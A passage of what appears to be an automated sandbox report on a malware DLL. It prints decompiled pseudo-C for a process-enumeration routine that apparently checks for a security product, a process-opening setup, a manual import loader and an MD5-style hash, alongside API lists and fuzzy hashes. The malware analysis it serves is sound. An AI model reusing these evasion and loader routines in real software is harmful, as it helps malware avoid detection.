                    0x010c4fb7
                    0x010c4fc2
                    0x010c4fc4
                    0x010c4fce
                    0x010c4fd3
                    0x010c4fd3
                    0x010c4fce
                    0x010c4fda
                    0x010c4ff0
                    0x010c4fdc
                    0x010c4fdc
                    0x010c4fe9
                    0x010c4fe9
                    0x010c4ff4
                    0x010c4ff6
                    0x010c5000
                    0x010c5005
                    0x010c5005
                    0x010c5000
                    0x010c500c
                    0x010c5022
                    0x010c500e
                    0x010c500e
                    0x010c501b
                    0x010c501b
                    0x010c5026
                    0x010c5028
                    0x010c5032
                    0x010c5037
                    0x010c5037
                    0x010c5032
                    0x010c503e
                    0x010c5054
                    0x010c5040
                    0x010c5040
                    0x010c504d
                    0x010c504d
                    0x010c5058
                    0x010c505a
                    0x010c5064
                    0x010c5069
                    0x010c5069
                    0x010c5064
                    0x010c5070
                    0x010c5086
                    0x010c5072
                    0x010c5072
                    0x010c507f
                    0x010c507f
                    0x010c508a
                    0x010c509d
                    0x010c509d
                    0x00000000
                    0x010c508c
                    0x010c508c
                    0x010c5096
                    0x00000000
                    0x010c50a7
                    0x010c50a7
                    0x010c50a9
                    0x010c50bf
                    0x010c50ab
                    0x010c50ab
                    0x010c50b8
                    0x010c50b8
                    0x010c50c3
                    0x010c50c5
                    0x010c50c8
                    0x010c50c9
                    0x010c50d0
                    0x010c50d2
                    0x010c50d3
                    0x010c50d3
                    0x010c50d0
                    0x010c50da
                    0x010c50f0
                    0x010c50dc
                    0x010c50dc
                    0x010c50e9
                    0x010c50e9
                    0x010c50f4
                    0x010c5102
                    0x010c510c
                    0x010c510c
                    0x010c5114
                    0x010c512a
                    0x010c5116
                    0x010c5116
                    0x010c5123
                    0x010c5123
                    0x010c512e
                    0x010c5141
                    0x010c5141
                    0x010c5146
                    0x010c514c
                    0x00000000
                    0x010c5130
                    0x010c5133
                    0x010c513a
                    0x010c513f
                    0x010c5151
                    0x010c5153
                    0x010c5169
                    0x010c5155
                    0x010c5155
                    0x010c5162
                    0x010c5162
                    0x010c516d
                    0x010c5179
                    0x010c517e
                    0x010c517e
                    0x010c516f
                    0x010c5172
                    0x010c5172
                    0x010c518c
                    0x010c5191
                    0x010c5197
                    0x00000000
                    0x010c519a
                    0x00000000
                    0x010c513f
                    0x010c512e
                    0x010c5096
                    0x010c508a

                    APIs
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,010CA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 010C4F98
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,010CA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 010C4FCA
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,010CA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 010C4FFC
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,010CA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 010C502E
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,010CA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 010C5060
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,010CA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 010C5092
                    • HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 010C5191
                    • HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 010C51A5
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: FreeHeap
                    • String ID: Ut
                    • API String ID: 3298025750-8415677
                    • Opcode ID: 7e1d48b9055c5939c1d9083e86fa3684de5ee74f217ef185cff59a1af80a20c1
                    • Instruction ID: cf5c2abaa454687a58e5def805ef14d75cdda8667ea599ba6f94cdfd1807ec78
                    • Opcode Fuzzy Hash: 7e1d48b9055c5939c1d9083e86fa3684de5ee74f217ef185cff59a1af80a20c1
                    • Instruction Fuzzy Hash: 1581A574B00219EFDB60DBB8DC98D9F7BE9BB88A40B344959B581D3104FA7AE9418F50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C2AB4 Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                    Download Yara Rule
                    C-Code - Quality: 68%
                    			E010C2AB4() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x10ca320; // 0x26dd5a8
						_t2 = _t9 + 0x10cbea8; // 0x73617661
						_push( &_v264);
						if( *0x10ca110() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                    0x010c2abf
                    0x010c2ac9
                    0x010c2acd
                    0x010c2ad7
                    0x010c2b08
                    0x010c2ade
                    0x010c2ae3
                    0x010c2af0
                    0x010c2af9
                    0x010c2b10
                    0x010c2afb
                    0x010c2b03
                    0x00000000
                    0x010c2b03
                    0x010c2b11
                    0x010c2b12
                    0x00000000
                    0x010c2b12
                    0x00000000
                    0x010c2b0c
                    0x010c2b18
                    0x010c2b1d

                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 010C2AC4
                    • Process32First.KERNEL32(00000000,?), ref: 010C2AD7
                    • Process32Next.KERNEL32(00000000,?), ref: 010C2B03
                    • CloseHandle.KERNEL32(00000000), ref: 010C2B12
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                    • String ID:
                    • API String ID: 420147892-0
                    • Opcode ID: ed7fe559f6087949bdd44a054bf633820f64c2c8841e4ed50aa22cd1ea9405bb
                    • Instruction ID: 6b70388d2704110437255a7809e7f17f88e77b6d6602a43c2603f2254e01dd55
                    • Opcode Fuzzy Hash: ed7fe559f6087949bdd44a054bf633820f64c2c8841e4ed50aa22cd1ea9405bb
                    • Instruction Fuzzy Hash: 80F0BB726001296FD731AB29CC49DEF37ACEBC5B10F0000E9FAD5D3000EA24D9468FA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 1000169C Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E1000169C() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;
				void* _t12;

				_t8 =  *0x100041b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x100041bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t12 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 > 0) {
						L5:
						 *0x100041ac = _t3;
						_t5 = GetCurrentProcessId();
						 *0x100041a8 = _t5;
						 *0x100041b0 = _t8;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x100041a4 = _t6;
						if(_t6 == 0) {
							 *0x100041a4 =  *0x100041a4 | 0xffffffff;
						}
						return 0;
					} else {
						_t12 = _t3 - _t3;
						goto L4;
					}
				}
			}










                    0x1000169d
                    0x100016ab
                    0x100016b3
                    0x100016b8
                    0x1000170a
                    0x1000170a
                    0x100016ba
                    0x100016c2
                    0x100016ca
                    0x100016ca
                    0x10001706
                    0x10001708
                    0x00000000
                    0x00000000
                    0x00000000
                    0x100016c4
                    0x100016c6
                    0x100016cc
                    0x100016cc
                    0x100016d1
                    0x100016df
                    0x100016e4
                    0x100016ea
                    0x100016f2
                    0x100016f7
                    0x100016f9
                    0x100016f9
                    0x10001703
                    0x100016c8
                    0x100016c8
                    0x00000000
                    0x100016c8
                    0x100016c6

                    APIs
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,10001082), ref: 100016AB
                    • GetVersion.KERNEL32 ref: 100016BA
                    • GetCurrentProcessId.KERNEL32 ref: 100016D1
                    • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 100016EA
                    Memory Dump Source
                    • Source File: 00000001.00000002.811213505.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000001.00000002.811226505.0000000010005000.00000040.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10000000_loaddll32.jbxd
                    Similarity
                    • API ID: Process$CreateCurrentEventOpenVersion
                    • String ID:
                    • API String ID: 845504543-0
                    • Opcode ID: 91fb625a8f9509fb00be4d021992df405f1d53defdd73eea256b4d4a3827a3f9
                    • Instruction ID: 68b7ec8200611ed460befc8ec23b9cf59c5310516807f67d0faef169e7c69390
                    • Opcode Fuzzy Hash: 91fb625a8f9509fb00be4d021992df405f1d53defdd73eea256b4d4a3827a3f9
                    • Instruction Fuzzy Hash: 25F062B068A3309EF751DF68AC897C23BE8E7197D1F068015E644C61FCD7B044918B99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 10001BE8 Relevance: 3.1, APIs: 2, Instructions: 92libraryloaderCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E10001BE8(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x100041cc;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71);
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x69b25f44;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x69b25ec5;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x69b25f44;
										}
										 *_v16 = _t55;
										_t58 = 0x593682f4 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x964da13a;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}




























                    0x10001be8
                    0x10001bf1
                    0x10001bf6
                    0x10001bfc
                    0x10001c05
                    0x10001c0b
                    0x10001c0d
                    0x10001c10
                    0x10001c15
                    0x10001c1c
                    0x10001c1c
                    0x10001c20
                    0x10001c28
                    0x10001c2b
                    0x00000000
                    0x00000000
                    0x10001c31
                    0x10001c3b
                    0x10001c3d
                    0x10001c40
                    0x10001c43
                    0x10001c47
                    0x10001c4f
                    0x10001c51
                    0x10001c54
                    0x10001cbc
                    0x10001cbc
                    0x10001cc0
                    0x00000000
                    0x00000000
                    0x10001c59
                    0x10001c5f
                    0x10001c61
                    0x10001c74
                    0x10001c77
                    0x10001c77
                    0x10001c77
                    0x10001c7b
                    0x10001c63
                    0x10001c63
                    0x10001c6b
                    0x10001c6d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x10001c6d
                    0x10001c5b
                    0x10001c5b
                    0x10001c6f
                    0x10001c6f
                    0x10001c6f
                    0x10001c7e
                    0x10001c81
                    0x10001c83
                    0x10001c8a
                    0x10001c85
                    0x10001c85
                    0x10001c85
                    0x10001c92
                    0x10001c98
                    0x10001c9a
                    0x10001cca
                    0x10001c9c
                    0x10001c9c
                    0x10001c9f
                    0x10001ca1
                    0x10001ca9
                    0x10001ca9
                    0x10001cae
                    0x10001cb0
                    0x10001cb7
                    0x10001cb9
                    0x10001cb9
                    0x10001cb9
                    0x00000000
                    0x10001cb9
                    0x00000000
                    0x10001c9a
                    0x10001c49
                    0x10001c4b
                    0x10001c4d
                    0x00000000
                    0x00000000
                    0x10001c4d
                    0x10001ccd
                    0x10001ccd
                    0x10001cd4
                    0x10001cd9
                    0x00000000
                    0x00000000
                    0x10001cdf
                    0x10001cea
                    0x00000000
                    0x10001cea
                    0x10001ce1
                    0x10001ce1
                    0x10001ce7
                    0x00000000
                    0x10001ce7
                    0x10001c15
                    0x10001ceb
                    0x10001cf0

                    APIs
                    • LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 10001C20
                    • GetProcAddress.KERNEL32(?,00000000), ref: 10001C92
                    Memory Dump Source
                    • Source File: 00000001.00000002.811213505.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000001.00000002.811226505.0000000010005000.00000040.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10000000_loaddll32.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID:
                    • API String ID: 2574300362-0
                    • Opcode ID: 8be51d2265ce6978ffd525ccecd7ea59ab7f198a23a8f22c3242a6123d44775f
                    • Instruction ID: 9a558a10c842885ef377bdf559df42a0ff7ab32311e040cca193c1bec9e7486c
                    • Opcode Fuzzy Hash: 8be51d2265ce6978ffd525ccecd7ea59ab7f198a23a8f22c3242a6123d44775f
                    • Instruction Fuzzy Hash: 1E311971A4121ADFFB54CF99C890AEEB7F9FF04284B21456DD805EB258E770EA40CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C6C62 Relevance: 1.9, APIs: 1, Instructions: 610COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 50%
                    			E010C6C62(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t274;
				signed int _t337;
				void* _t347;
				signed int _t348;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				signed int _t366;
				signed int _t375;
				signed int _t377;
				signed int _t379;
				signed int _t381;
				signed int _t383;
				intOrPtr* _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t413;
				signed int _t415;
				signed int _t417;
				signed int _t419;
				signed int _t421;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				signed int _t437;
				signed int _t439;
				signed int _t441;
				signed int _t443;
				signed int _t445;
				void* _t447;
				signed int _t507;
				signed int _t598;
				signed int _t606;
				signed int _t612;
				signed int _t678;
				signed int* _t681;
				signed int _t682;
				signed int _t684;
				signed int _t689;
				signed int _t691;
				signed int _t696;
				signed int _t698;
				signed int _t717;
				signed int _t719;
				signed int _t721;
				signed int _t723;
				signed int _t725;
				signed int _t727;
				signed int _t733;
				signed int _t739;
				signed int _t741;
				signed int _t743;
				signed int _t745;
				signed int _t747;

				_t226 = _a4;
				_t347 = __ecx + 2;
				_t681 =  &_v76;
				_t447 = 0x10;
				do {
					_t274 =  *(_t347 - 1) & 0x000000ff;
					_t347 = _t347 + 4;
					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
					_t681 =  &(_t681[1]);
					_t447 = _t447 - 1;
				} while (_t447 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t682 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t407 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t348 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
				asm("rol ecx, 0xc");
				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
				asm("ror esi, 0xa");
				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
				_v8 = _t684;
				_t689 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
				asm("rol ecx, 0xc");
				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
				asm("ror esi, 0xa");
				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
				_v8 = _t691;
				_t696 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
				asm("rol ecx, 0xc");
				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
				asm("ror esi, 0xa");
				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
				_v8 = _t698;
				asm("rol eax, 0x7");
				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
				_t507 =  !_t356;
				asm("ror edx, 0xf");
				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
				_v12 = _t415;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
				asm("rol eax, 0x5");
				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
				asm("rol ecx, 0x9");
				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
				asm("ror esi, 0xc");
				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
				asm("rol eax, 0x5");
				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
				asm("rol ecx, 0x9");
				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
				asm("ror esi, 0xc");
				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
				asm("rol eax, 0x5");
				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
				asm("rol ecx, 0x9");
				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
				asm("ror esi, 0xc");
				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
				asm("rol eax, 0x5");
				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
				asm("rol ecx, 0x9");
				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
				asm("ror esi, 0xc");
				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
				asm("rol eax, 0x4");
				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
				asm("rol ecx, 0xb");
				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
				_t598 = _t366 ^ _t425;
				asm("ror esi, 0x9");
				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
				asm("rol eax, 0x4");
				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
				asm("rol edi, 0xb");
				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
				_t337 = _t606 ^ _t427;
				asm("ror ecx, 0x9");
				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
				asm("rol eax, 0x4");
				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
				asm("rol esi, 0xb");
				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
				_t429 = _t733 ^ _t612;
				asm("ror ecx, 0x9");
				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
				asm("rol eax, 0x4");
				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
				asm("rol edx, 0xb");
				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
				asm("ror ecx, 0x9");
				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
				asm("rol eax, 0x6");
				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
				asm("rol edx, 0xa");
				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
				asm("ror ecx, 0xb");
				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
				asm("rol eax, 0x6");
				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
				asm("rol edx, 0xa");
				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
				asm("ror ecx, 0xb");
				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
				asm("rol eax, 0x6");
				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
				asm("rol edx, 0xa");
				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
				asm("ror edi, 0xb");
				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
				asm("rol eax, 0x6");
				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
				asm("rol edx, 0xa");
				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
				_t399 = _a4;
				asm("rol esi, 0xf");
				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
				 *_t399 =  *_t399 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
				return memset( &_v76, 0, 0x40);
			}



































































































                    0x010c6c65
                    0x010c6c70
                    0x010c6c73
                    0x010c6c76
                    0x010c6c77
                    0x010c6c77
                    0x010c6c82
                    0x010c6c93
                    0x010c6c95
                    0x010c6c98
                    0x010c6c98
                    0x010c6c9b
                    0x010c6c9b
                    0x010c6c9e
                    0x010c6c9e
                    0x010c6ca1
                    0x010c6ca1
                    0x010c6cbe
                    0x010c6cc1
                    0x010c6cd7
                    0x010c6cda
                    0x010c6cf4
                    0x010c6cf7
                    0x010c6d0d
                    0x010c6d10
                    0x010c6d12
                    0x010c6d2a
                    0x010c6d2d
                    0x010c6d30
                    0x010c6d48
                    0x010c6d4b
                    0x010c6d65
                    0x010c6d68
                    0x010c6d7e
                    0x010c6d81
                    0x010c6d83
                    0x010c6d9b
                    0x010c6da0
                    0x010c6da3
                    0x010c6db9
                    0x010c6dbc
                    0x010c6dd6
                    0x010c6dd9
                    0x010c6def
                    0x010c6df2
                    0x010c6df4
                    0x010c6e0f
                    0x010c6e12
                    0x010c6e29
                    0x010c6e2c
                    0x010c6e30
                    0x010c6e49
                    0x010c6e4c
                    0x010c6e4e
                    0x010c6e51
                    0x010c6e6c
                    0x010c6e6f
                    0x010c6e88
                    0x010c6e8b
                    0x010c6e9b
                    0x010c6e9e
